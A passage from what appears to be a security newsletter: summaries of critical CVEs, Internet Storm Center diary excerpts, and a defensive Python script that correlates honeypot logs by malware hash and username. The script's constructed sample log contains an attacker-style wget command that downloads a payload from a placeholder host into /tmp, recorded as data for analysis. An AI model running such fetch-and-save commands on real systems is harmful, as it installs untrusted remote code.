NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-62215
NVD References:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62215
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-62215

CVE-2025-42887 – SAP Solution Manager is vulnerable to code injection by authenticated attackers through remote-enabled function modules, potentially granting full system control and severely impacting confidentiality, integrity, and availability.
Product: SAP Solution Manager
CVSS Score: 9.9
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-42887
NVD References: https://url.sap/sapsecuritypatchday

CVE-2025-42890 – SAP SQL Anywhere Monitor (Non-GUI) has baked credentials into the code, allowing unintended users to access resources and potentially execute arbitrary code, posing a high risk to system security.
Product: SAP SQL Anywhere Monitor
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-42890
NVD References: https://url.sap/sapsecuritypatchday

CVE-2017-20210 – QNAP Photo Station 5.4.1 and 5.2.7 contain a vulnerability associated with XMR (Monero) cryptocurrency-mining malware.
Product: QNAP Photo Station
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2017-20210
NVD References: https://www.qnap.com/en-in/security-advisory/nas-201705-04

CVE-2025-8324 – Zohocorp ManageEngine Analytics Plus versions 6170 and below are vulnerable to unauthenticated SQL injection due to improper filter configuration.
Product: Zohocorp ManageEngine Analytics Plus
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-8324
NVD References: https://www.manageengine.com/analytics-plus/CVE-2025-8324.html

CVE-2025-13021, CVE-2025-13022, CVE-2025-13023 & CVE-2025-13026 – Incorrect boundary conditions in the Graphics: WebGPU component. These vulnerabilities affect Firefox < 145.
Product: Mozilla Firefox
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-13021
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-13022
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-13023
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-13026
NVD References: https://www.mozilla.org/security/advisories/mfsa2025-87/

CVE-2025-13024 – JIT miscompilation in the JavaScript Engine: JIT component. This vulnerability affects Firefox < 145.
Product: Mozilla Firefox
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-13024
NVD References: https://www.mozilla.org/security/advisories/mfsa2025-87/

CVE-2025-13032 – Avast/AVG Antivirus <25.3 on Windows is vulnerable to a double fetch in the sandbox kernel driver, which local attackers can turn into a pool overflow to escalate privileges.
Product: Avast AVG Antivirus
CVSS Score: 9.9
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-13032

CVE-2025-60724 – Heap-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.
Product: Microsoft Office
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-60724
NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-60724

CVE-2025-12870 & CVE-2025-12871 – aEnrich’s a+HRD software is vulnerable to Authentication Abuse, enabling unauthorized remote attackers to create admin access tokens for elevated system access.
Product: aEnrich a+Hrd
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-12870
NVD References: https://www.twcert.org.tw/en/cp-139-10487-12a32-2.html

CVE-2025-63666 – Tenda AC15 v15.03.05.18_multi exposes account password hash and uses insecure session identifier, allowing attackers to steal cookies and access protected resources.
Product: Tenda AC15
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-63666
NVD References: https://github.com/Remenis/CVE-2025-63666

CVE-2025-11366 – N-central < 2025.4 is vulnerable to authentication bypass via path traversal.
Product: N-Able N-Central
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-11366
NVD References: https://me.n-able.com/s/security-advisory/aArVy0000000rcDKAQ/cve202511366-ncentral-authentication-bypass-via-path-traversal

CVE-2025-11367 – The N-central Software Probe < 2025.4 is vulnerable to remote code execution via deserialization.
Product: N-Able N-Central
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-11367
NVD References: https://me.n-able.com/s/security-advisory/aArVy0000000rfRKAQ/cve202511367-ncentral-windows-software-probe-remote-code-execution

CVE-2025-63289 – The Sogexia Android App’s encryption_helper.dart file, in SDK v35 and below, contains hardcoded encryption keys.
Product: Sogexia Android App Compile
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-63289

CVE-2025-63353 – FiberHome GPON ONU HG6145F1 RP4423 is vulnerable to network access as attackers can predict the factory default Wi-Fi password from the SSID.
Product: FiberHome GPON ONU HG6145F1 RP4423
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-63353

CVE-2025-64280 & CVE-2025-64281 – Multiple vulnerabilities in CentralSquare Community Development 19.5.7.
Product: CentralSquare Community Development
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-64280
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-64281
NVD References: https://machevalia.blog/blog/multiple-vulnerabilities-in-centralsquare-etrakit-and-ivr

CVE-2025-56385 – WellSky Harmony version 4.1.0.2.83 contains a SQL injection vulnerability in the login functionality that could result in authentication bypass, data leakage, or full system compromise.
Product: WellSky Harmony
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-56385
NVD References: https://machevalia.blog/blog/cve-2025-56385-wellsky-harmony-sql-injection

CVE-2025-63679 – Free5GC v4.1.0 and before is vulnerable to Buffer Overflow during the processing of an UplinkRANConfigurationTransfer NGAP message from a gNB, causing the AMF process to crash.
Product: Free5GC v4.1.0
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-63679

CVE-2025-46608 – Dell Data Lakehouse versions prior to 1.6.0.0 have an Improper Access Control vulnerability that could allow a high privileged attacker to gain elevated privileges, compromising system integrity and customer data.
Product: Dell Data Lakehouse
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-46608
NVD References: https://www.dell.com/support/kbdoc/en-us/000390529/dsa-2025-375-security-update-for-dell-data-lakehouse-multiple-vulnerabilities

CVE-2025-12762 – pgAdmin is vulnerable to Remote Code Execution (RCE) when restoring PLAIN-format dump files in server mode, enabling attackers to execute arbitrary commands on the hosting server, compromising the database’s security.
Product: pgAdmin
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-12762

CVE-2025-64709 – Typebot’s HTTP Request component functionality prior to version 3.13.1 contains a Server-Side Request Forgery (SSRF) vulnerability that allows authenticated users to access AWS Instance Metadata Service (IMDS) and extract temporary AWS IAM credentials for the EKS node role, leading to complete compromise of the Kubernetes cluster and associated AWS infrastructure.
Product: Typebot chatbot builder
CVSS Score: 9.6
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-64709

CVE-2025-36096 – IBM AIX 7.2, 7.3, and IBM VIOS 3.1, 4.1 have insecure storage of NIM private keys, making them vulnerable to unauthorized access through man in the middle attacks.
Product: IBM AIX 7.2, and 7.3, VIOS 3.1, and 4.1
CVSS Score: 9.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-36096
NVD References: https://www.ibm.com/support/pages/node/7251173

CVE-2025-36250 – IBM AIX 7.2, 7.3, and IBM VIOS 3.1, 4.1 NIM server are vulnerable to remote code execution through the nimesis service due to improper process controls.
Product: IBM AIX 7.2 and 7.3, VIOS 3.1 and 4.1
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-36250
NVD References: https://www.ibm.com/support/pages/node/7251173

CVE-2025-36251 – The nimsh service SSL/TLS implementations in IBM AIX 7.2, 7.3, and IBM VIOS 3.1, 4.1 lack proper process controls and could allow remote attackers to execute arbitrary commands.
Product: IBM AIX 7.2, and 7.3 and IBM VIOS 3.1, and 4.1
CVSS Score: 9.6
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-36251
NVD References: https://www.ibm.com/support/pages/node/7251173

CVE-2025-54339 & CVE-2025-54343 – Desktop Alert PingAlert version 6.1.0.11 to 6.1.1.2 allows remote attackers to escalate privileges due to Incorrect Access Control vulnerabilities in the Application Server.
Product: Desktop Alert PingAlert
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-54339
NVD References:
https://desktopalert.net/cve-2025-54339/
https://desktopalert.net/CVE-2025-54343/

CVE-2025-13188 – D-Link DIR-816L 2_06_b09_beta has a stack-based buffer overflow in authenticationcgi_main of /authentication.cgi via manipulation of the Password argument, which can be exploited remotely. The device is no longer supported by the vendor, so no fix should be expected.
Product: D-Link DIR-816L
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-13188

CVE-2025-58083 – General Industrial Controls Lynx+ Gateway is vulnerable to remote device reset due to missing critical authentication in the embedded web server.
Product: General Industrial Controls Lynx+ Gateway
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-58083
NVD References: https://www.cisa.gov/news-events/ics-advisories/icsa-25-317-08

CVE-2025-13284 – ThinPLUS has an OS Command Injection vulnerability that allows unauthorized remote attackers to execute arbitrary commands on the server.
Product: ThinPLUS
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-13284
NVD References: https://www.twcert.org.tw/en/cp-139-10513-0d82b-2.html

CVE-2025-63747 – QaTraq 6.9.2 has default administrative account credentials that allow immediate login via the web application, granting attackers administrative access.
Product: QaTraq 6.9.2
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-63747

CVE-2024-44659 – PHPGurukul Online Shopping Portal 2.0 is vulnerable to SQL Injection via the email parameter in forgot-password.php.
Product: PHPGurukul Online Shopping Portal
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-44659

CVE-2025-40547, CVE-2025-40548 & CVE-2025-40549 – SolarWinds Serv-U has multiple vulnerabilities that allow a malicious actor with admin privileges to execute code.
Product: SolarWinds Serv-U
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-40547
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-40548
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-40549
NVD References:
https://documentation.solarwinds.com/en/success_center/servu/content/release_notes/servu_15-5-3_release_notes.htm
https://www.solarwinds.com/trust-center/security-advisories/CVE-2025-40547
https://www.solarwinds.com/trust-center/security-advisories/CVE-2025-40548
https://www.solarwinds.com/trust-center/security-advisories/CVE-2025-40549

CVE-2025-41733 – Affected devices do not check whether they have already been initialized, allowing an unauthenticated remote attacker to set root credentials via POST requests to the commissioning wizard.
Product: METZ CONNECT EWIO2
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-41733
NVD References:
https://certvde.com/de/advisories/VDE-2025-097
https://www.cisa.gov/news-events/ics-advisories/icsa-25-322-05

CVE-2025-41734 – An unauthenticated remote attacker can execute arbitrary PHP files and gain full access to the affected devices.
Product: METZ CONNECT EWIO2
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-41734
NVD References:
https://certvde.com/de/advisories/VDE-2025-097
https://www.cisa.gov/news-events/ics-advisories/icsa-25-322-05

CVE-2025-9312 – WSO2 products are vulnerable to a missing authentication enforcement issue in their mutual TLS implementation, allowing for unauthenticated requests and potential unauthorized access by malicious actors.
Product: WSO2 System REST APIs and SOAP services
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-9312
NVD References: https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2025/WSO2-2025-4494/

CVE-2025-11170 – The cpi-wp-migration CPI plugin for WordPress allows unauthenticated attackers to upload arbitrary files on the server, potentially leading to remote code execution.
Product: cpi-wp-migration CPI plugin for WordPress
Active Installations: This plugin has been closed as of November 7, 2025 and is not available for download. This closure is temporary, pending a full review.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-11170
NVD References:
https://wordpress.org/plugins/cpi-wp-migration/
https://www.wordfence.com/threat-intel/vulnerabilities/id/8a96d6d5-a5e3-4648-902b-f9d1f8e57e5c?source=cve

CVE-2025-12813 – The Holiday class post calendar plugin for WordPress is vulnerable to Remote Code Execution in versions up to and including 7.1 via the ‘contents’ parameter, allowing unauthenticated attackers to execute code on the server.
Product: WordPress Holiday class post calendar plugin
Active Installations: This plugin has been closed as of November 7, 2025 and is not available for download. This closure is temporary, pending a full review.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-12813
NVD References: https://www.wordfence.com/threat-intel/vulnerabilities/id/7f7968c4-589c-4949-9f69-4a0ba4db4ea9?source=cve

CVE-2025-12539 – The TNC Toolbox: Web Performance plugin for WordPress is vulnerable to Sensitive Information Exposure due to storing cPanel API credentials in unprotected files, allowing attackers to compromise the hosting environment.
Product: TNC Toolbox Web Performance plugin for WordPress
Active Installations: 1,000+
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-12539
NVD References: https://www.wordfence.com/threat-intel/vulnerabilities/id/2eaa5a5c-c11f-40d0-be69-c3ec8029a819?source=cve

CVE-2025-9501 – W3 Total Cache WordPress plugin before 2.8.13 allows unauthenticated users to execute PHP commands by injecting a malicious payload in a comment.
Product: W3-EDGE W3 Total Cache WordPress plugin
Active Installations: 1 million+
CVSS Score: 9.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-9501

@RISK: The Consensus Security Vulnerability Alert: Vol. 25, Num. 44

INTERNET STORM CENTER SPOTLIGHT

Microsoft Patch Tuesday for November 2025
Published: 2025-11-11
Last Updated: 2025-11-11 19:24:30 UTC
by Johannes Ullrich (Version: 1)

Today’s Microsoft Patch Tuesday offers fixes for 80 different vulnerabilities. One of the vulnerabilities is already being exploited, and five are rated as critical.

Notable Vulnerabilities:

CVE-2025-62215: This vulnerability is already being exploited. It is a privilege escalation vulnerability in the Windows Kernel. These types of vulnerabilities are often exploited as part of a more complex attack chain; however, exploiting this specific vulnerability is likely to be relatively straightforward, given the existence of prior similar vulnerabilities.

CVE-2025-60724: A critical GDI+ remote execution vulnerability. GDI+ parses various graphics files. The attack surface is likely huge, as anything in Windows (Browsers, email, and Office Documents) will use this library at some point to display images. We also have a critical vulnerability in DirectX, CVE-2025-60716. Microsoft classifies this as a privilege escalation issue, yet still rates it as critical.

CVE-2025-62199: A code execution vulnerability in Microsoft Office. Another component with a huge attack surface that is often exploited.

Given the number and type of vulnerabilities, I would consider this patch Tuesday “lighter than normal”. There are no “Patch Now” vulnerabilities, and I suggest applying these vulnerabilities in accordance with your vulnerability management program …

Read the full entry: https://isc.sans.edu/diary/Microsoft+Patch+Tuesday+for+November+2025/32468/

It isn’t always defaults: Scans for 3CX usernames
Published: 2025-11-10
Last Updated: 2025-11-10 15:23:31 UTC
by Johannes Ullrich (Version: 1)

Today, I noticed scans using the username “FTP_3cx” showing up in our logs. 3CX is a well-known maker of business phone system software. My first guess was that this was a default user for one of their systems. But Google came up empty for this particular string. The 3CX software does not appear to run an FTP server, but it offers a feature to back up configurations to an FTP server. The example user used in the documentation is “3cxftpuser”, not “FTP_3cx”. Additionally, the documentation notes that the FTP server can run on a different system from the 3CX software. For a backup, it would not make much sense to have it all run on the same system.

The scans we are seeing likely target FTP servers users set up to back up 3CX configurations, and not the 3CX software itself. I am not familiar enough with 3CX to know precisely what the backup contains, but it most likely includes sufficient information to breach the 3CX installation.

The credentials we observe with our Cowrie-based honeypots are collected for Telnet and FTP. In particular, on Linux systems, you often use a system user to connect via FTP. Any credentials working via FTP will also work for Telnet or SSH. Keep that in mind when configuring a user for FTP access, and of course, FTP should not be your first choice for backing up sensitive data, but we all know it does happen ...

Read the full entry: https://isc.sans.edu/diary/It+isnt+always+defaults+Scans+for+3CX+usernames/32464/

Binary Breadcrumbs: Correlating Malware Samples with Honeypot Logs Using PowerShell
[Guest Diary]
Published: 2025-11-05
Last Updated: 2025-11-06 02:27:25 UTC
by David Hammond (Version: 1)

[This is a Guest Diary by David Hammond, an ISC intern as part of the SANS.edu BACS program]

My last college credit on my way to earning a bachelor’s degree was an internship opportunity at the Internet Storm Center. A great opportunity, but one that required the care and feeding of a honeypot. The day it arrived I plugged the freshly imaged honeypot into my home router and happily went about my day. I didn’t think too much about it until the first attack observation was due. You see, I travel often, but my honeypot does not. Furthermore, the administrative side of the honeypot was only accessible through the internal network. I wasn’t about to implement a whole remote solution just to get access while on the road. Instead, I followed some very good advice. I started downloading regular backups of the honeypot logs on a Windows laptop I frequently had with me.

The internship program encouraged us to at least initially review our honeypot logs with command line utilities, such as jq and all its flexibility with filtering. Combined with other standard Unix-like operating system tools, such as wc (word count), less, head, and cut, it was possible to extract exactly what I was looking for. I initially tried using more graphical tools but found I enjoy “living” in the command line better. When I first start looking at logs, I am not always sure what I’m looking for. Command line tools allow me to quickly look for outliers in the data. I can see what sticks out by negating everything that looks the same.

So, what’s the trouble? None of these tools were available on my Windows laptop. Admittedly, most of what I mention above is available for Windows, but my ability to install software was restricted on this machine, and I knew that native alternatives existed. At the time I had several directories of JSON logs, and a long list of malware hash values corresponding to an attack I was interested in understanding better. Here’s how a few lines of PowerShell can transform scattered honeypot logs into a clear picture of what really happened …

Read the full entry: https://isc.sans.edu/diary/Binary+Breadcrumbs+Correlating+Malware+Samples+with+Honeypot+Logs+Using+PowerShell+Guest+Diary/32454/
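The two diaries above describe the same workflow from different angles: Cowrie honeypot logs are JSON, one line per event, and the analyst wants to pivot from a list of malware hashes (Binary Breadcrumbs) or from a suspicious username such as “FTP_3cx” (the 3CX scans) to the sessions and source IPs behind them. The following is an added example in Python, not the diary author’s PowerShell and not ISC code. It assumes Cowrie’s JSON field names (eventid, src_ip, session, username, shasum, url); the log lines, hashes and IP addresses are constructed for the example and are not real honeypot data.

```python
import json
from collections import defaultdict

# Constructed Cowrie-style JSON lines (not real honeypot data). Field names
# follow Cowrie's JSON output; every value below is invented for this example.
SAMPLE_LOG = r'''
{"eventid":"cowrie.login.success","timestamp":"2025-11-10T04:12:01.000Z","src_ip":"203.0.113.7","session":"a1b2c3","username":"root","password":"123456"}
{"eventid":"cowrie.command.input","timestamp":"2025-11-10T04:12:03.000Z","src_ip":"203.0.113.7","session":"a1b2c3","input":"wget http://198.51.100.9/x86 -O /tmp/x86"}
{"eventid":"cowrie.session.file_download","timestamp":"2025-11-10T04:12:05.000Z","src_ip":"203.0.113.7","session":"a1b2c3","url":"http://198.51.100.9/x86","shasum":"3d0f1e2a9c4b5d6e7f8091a2b3c4d5e6f708192a3b4c5d6e7f8091a2b3c4d5e6"}
{"eventid":"cowrie.login.failed","timestamp":"2025-11-10T05:00:00.000Z","src_ip":"198.51.100.42","session":"d4e5f6","username":"FTP_3cx","password":"FTP_3cx"}
{"eventid":"cowrie.login.failed","timestamp":"2025-11-10T05:00:02.000Z","src_ip":"198.51.100.42","session":"d4e5f6","username":"3cxftpuser","password":"backup"}
{"eventid":"cowrie.session.file_download","timestamp":"2025-11-10T06:30:00.000Z","src_ip":"192.0.2.55","session":"778899","url":"http://192.0.2.200/a.sh","shasum":"ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"}
this line is not json and is skipped by the parser
'''

# Constructed inputs: the analyst's hash list and a username watchlist.
KNOWN_HASHES = ["3d0f1e2a9c4b5d6e7f8091a2b3c4d5e6f708192a3b4c5d6e7f8091a2b3c4d5e6"]
WATCH_USERNAMES = ["FTP_3cx", "3cxftpuser"]


def parse_cowrie_lines(text):
    """Parse newline-delimited JSON; blank and malformed lines are skipped, not fatal."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def correlate_hashes(events, hashes):
    """Map each known SHA-256 to the download events that produced it (IP, session, URL)."""
    wanted = {h.lower() for h in hashes}
    hits = defaultdict(list)
    for ev in events:
        if ev.get("eventid") != "cowrie.session.file_download":
            continue
        digest = (ev.get("shasum") or "").lower()
        if digest in wanted:
            hits[digest].append({
                "timestamp": ev.get("timestamp"),
                "src_ip": ev.get("src_ip"),
                "session": ev.get("session"),
                "url": ev.get("url"),
            })
    return dict(hits)


def session_timeline(events, session_id):
    """Everything one session did, in log order: logins, commands, downloads."""
    return [ev for ev in events if ev.get("session") == session_id]


def username_watchlist(events, usernames):
    """Source IPs that attempted any watchlisted username, successful or not."""
    wanted = {u.lower() for u in usernames}
    seen = defaultdict(set)
    for ev in events:
        if ev.get("eventid") in ("cowrie.login.success", "cowrie.login.failed"):
            user = ev.get("username") or ""
            if user.lower() in wanted:
                seen[user].add(ev.get("src_ip"))
    return {u: sorted(ips) for u, ips in seen.items()}


if __name__ == "__main__":
    evs = parse_cowrie_lines(SAMPLE_LOG)
    for digest, downloads in correlate_hashes(evs, KNOWN_HASHES).items():
        print(digest[:12], downloads)
        for d in downloads:  # pivot from the hash to the whole session
            for ev in session_timeline(evs, d["session"]):
                print("   ", ev["timestamp"], ev["eventid"], ev.get("input") or ev.get("url") or "")
    print(username_watchlist(evs, WATCH_USERNAMES))
```

Against a real honeypot, replace SAMPLE_LOG with the concatenated contents of the cowrie.json files and KNOWN_HASHES with the analyst’s list; the pivot from hash to session to source IP is the same, and the watchlist function is the quick answer to “who else tried this username?”.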

OTHER INTERNET STORM CENTER ENTRIES

Honeypot: Requests for (Code) Repositories (2025.11.08)
https://isc.sans.edu/diary/Honeypot+Requests+for+Code+Repositories/32460/

Apple Patches Everything, Again (2025.11.04)
https://isc.sans.edu/diary/Apple+Patches+Everything+Again/32448/

RECENT CVEs
The list is assembled by pulling recent vulnerabilities from NIST NVD, Microsoft, Twitter mentions of vulnerabilities, ISC Diaries and Podcast, and the CISA list of known exploited vulnerabilities. There are also some unscored, but significant, vulnerabilities at the end. This includes vulnerabilities that have not been added to the NVD yet.

CVE-2025-59396 – WatchGuard Firebox devices have a vulnerability that allows administrative access through SSH on port 4118 using the readwrite password for the admin account until 2025-09-10.
Product: WatchGuard Firebox devices
CVSS Score: 0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-59396
ISC Podcast: https://isc.sans.edu/podcastdetail/9694

CVE-2025-12480 – Triofox is vulnerable to an Improper Access Control flaw, allowing access to initial setup pages post-completion in versions before 16.7.10368.56560.
Product: Triofox
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-12480
ISC Podcast: https://isc.sans.edu/podcastdetail/9696
NVD References:
https://access.triofox.com/releases_history/
https://cloud.google.com/blog/topics/threat-intelligence/triofox-vulnerability-cve-2025-12480
https://github.com/mandiant/Vulnerability-Disclosures/blob/master/2025/MNDT-2025-0008.md

CVE-2025-60724 – Heap-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.
Product: Microsoft Graphics Component
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-60724
ISC Diary: https://isc.sans.edu/diary/32468
ISC Podcast: https://isc.sans.edu/podcastdetail/9696
NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-60724

CVE-2025-54863 – Radiometrics VizAir is vulnerable to remote exposure of its REST API key, enabling attackers to manipulate weather data, disrupt airport operations, and engage in denial-of-service attacks.
Product: Radiometrics VizAir
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-54863
NVD References: https://www.cisa.gov/news-events/ics-advisories/icsa-25-308-04

CVE-2025-61945 – Radiometrics VizAir is vulnerable to remote attackers through unauthorized access to the admin panel, allowing manipulation of critical weather parameters and potentially endangering aircraft safety.
Product: Radiometrics VizAir
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-61945
NVD References: https://www.cisa.gov/news-events/ics-advisories/icsa-25-308-04

CVE-2025-61956 – Radiometrics VizAir lacks authentication mechanisms, enabling attackers to manipulate settings, mislead air traffic control, pilots, and forecasters.
Product: Radiometrics VizAir
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-61956
NVD References: https://www.cisa.gov/news-events/ics-advisories/icsa-25-308-04

CVE-2025-47776 – Mantis Bug Tracker (MantisBT) is vulnerable to a type juggling issue in authentication code, allowing attackers to log in without knowing the victim’s password in versions 2.27.1 and below.
Product: MantisBT
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-47776

CVE-2025-52910 – Samsung Mobile Processor and Wearable Processor Exynos 1280, 2200, 1330, 1380, 1480, 2400 are vulnerable to a Use-After-Free leading to privilege escalation.
Product: Samsung Exynos 1280
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-52910

CVE-2025-12735 – The expr-eval library is vulnerable to arbitrary code execution due to insufficient input validation in the evaluate() function.
Product: expr-eval library JavaScript expression parser
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-12735

CVE-2025-55108 – Control-M/Agent is vulnerable to unauthenticated remote code execution and unauthorized file access if mutual SSL/TLS authentication is not enabled.
Product: BMC Control-M/Agent
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-55108

CVE-2025-47151 – Entr’ouvert Lasso 2.5.1 and 2.8.2 are vulnerable to type confusion, allowing attackers to execute arbitrary code through specially crafted SAML responses.
Product: Entrouvert Lasso
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-47151

CVE-2025-64459 – Django 5.2 before 5.2.8, 5.1 before 5.1.14, and 4.2 before 4.2.26 are vulnerable to SQL injection in the QuerySet filter(), exclude() and get() methods and in the Q() class, via a crafted dictionary passed as the _connector keyword argument.
Product: Djangoproject
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-64459

CVE-2025-61304 – OS command injection vulnerability in the Dynatrace ActiveGate ping extension up to version 1.016 via a crafted IP address.
Product: Dynatrace ActiveGate ping extension
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-61304

CVE-2025-63601 – Snipe-IT is vulnerable to authenticated remote attackers uploading and executing system commands via a malicious backup file prior to version 8.3.3.
Product: Snipe-IT app
CVSS Score: 9.9
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-63601

CVE-2025-20354 – Cisco Unified CCX is vulnerable to arbitrary file upload and command execution due to inadequate authentication mechanisms, enabling an attacker to gain root access on affected systems.
Product: Cisco Unified Contact Center Express
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-20354
NVD References: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cc-unauth-rce-QeN8h7mQ

CVE-2025-20358 – Cisco Unified CCX Contact Center Express Editor application is vulnerable to authentication bypass, granting unauthenticated attackers administrative permissions for script creation and execution.
Product: Cisco Unified Contact Center Express
CVSS Score: 9.4
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-20358
NVD References: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cc-unauth-rce-QeN8h7mQ

CVE-2025-45378 – Dell CloudLink versions 8.0 through 8.1.2 are vulnerable to unauthorized access and privilege escalation through a restricted shell exploit.
Product: Dell CloudLink
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-45378
NVD References: https://www.dell.com/support/kbdoc/en-us/000384363/dsa-2025-374-security-update-for-dell-cloudlink-multiple-security-vulnerabilities

CVE-2025-46364 – Dell CloudLink versions prior to 8.1.1 are vulnerable to a privilege escalation attack via CLI Escape Vulnerability.
Product: Dell CloudLink
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-46364
NVD References: https://www.dell.com/support/kbdoc/en-us/000384363/dsa-2025-374-security-update-for-dell-cloudlink-multiple-security-vulnerabilities

CVE-2025-56231 – Tonec Internet Download Manager 6.42.41.1 and earlier suffers from Missing SSL Certificate Validation, which allows attackers to bypass update protections.
Product: Tonec Internet Download Manager
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-56231

CVE-2025-55343 – Quipux 4.0.1 through e1774ac allows authenticated users to conduct SQL injection attacks in multiple parameters.
Product: Quipux 4.0.1 through e1774ac
CVSS Score: 9.9
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-55343

CVE-2025-63416 – SelfBest platform 2023.3 has a Stored Cross-Site Scripting vulnerability in its chat functionality that allows attackers to execute arbitrary JavaScript in other users’ sessions, leading to privilege escalation and sensitive data compromise.
Product: SelfBest
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-63416

CVE-2025-63334 – PocketVJ CP version 3.9.1 is susceptible to unauthenticated remote code execution via the opacityValue POST parameter in submit_opacity.php.
Product: PocketVJ-CP-v3 pvj
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-63334

CVE-2025-62161 – Youki is vulnerable to a container escape attack in versions 0.5.6 and below due to insufficient validation of the source /dev/null, fixed in version 0.5.7.
Product: Youki-Dev
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-62161

CVE-2025-62596 – Youki is vulnerable to a write-target validation flaw in versions 0.5.6 and below, allowing for writes to unintended procfs locations through shared-mount race exploitation.
Product: Youki-Dev
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-62596

CVE-2025-64163 – DataEase versions 2.10.14 and below have an SSRF vulnerability because the dns:// scheme was not covered by the URL protection; fixed in version 2.10.15.
Product: DataEase
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-64163

CVE-2025-64164 – DataEase version 2.10.14 and below is vulnerable to JNDI injection when establishing JDBC connections to Oracle.
